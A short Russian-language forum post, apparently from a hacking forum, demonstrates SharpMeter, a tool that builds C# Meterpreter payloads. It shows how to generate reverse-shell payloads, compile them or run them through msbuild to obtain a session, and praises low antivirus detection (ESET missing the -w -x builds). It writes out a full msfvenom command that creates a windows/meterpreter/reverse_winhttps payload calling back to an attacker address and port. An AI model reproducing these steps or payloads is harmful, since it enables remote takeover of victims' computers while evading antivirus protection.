И снова здравствуйте друзья)
Коротенький пост,посмотрим сегодня функционал программы SharpMeter которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с гитхаба. Запустили на виндоус машине,смотрим справку:
Поддерживает наш скрипт два режима генерации полезной нагрузки:
Путем ввода айпи и порта атакуещего + опции
Путем добавления хекс кода + опции
И так давайте сначала первый простой метод путем создания без либо каких опций:
Видите он как и мой скрипт создает список команд для метасплоита и команду компиляции через NET Framework.
Поднимем листенер,выполним команду для компиляции:
Запускаем - получаем сессию
Что касается детекта на АВ. Вот
Ссылка скрыта от гостей
:
Из известных АВ детектится Есетом. Ну не FUD но тоже не плохо довольно) Если использовать с параметрами -w -x , то детект будет 7/41 но ЕСЕТ не будет палит и другие известные АВ также
Вот
Ссылка скрыта от гостей
бинарника созданно с этими параметрами.Дальше пробуем тоже самое только с дополнительными опциями:
Получили команду для msbuild.
Запускаем и прилетает сессия без компиляции в бинарный файл.
Ну и второй способ довольно интересный)))
Создаем полезную нагрузку через msfvenom сначала командой:
Код:
msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.137.92 lport=1337 -f hex
Копипастим сроку в хексе в наш параметр для SharpMeter:
Запускаем команду msbuild - получаем сессию)
Все довольно просто и удобно
Всем спасибо)
Последнее редактирование:
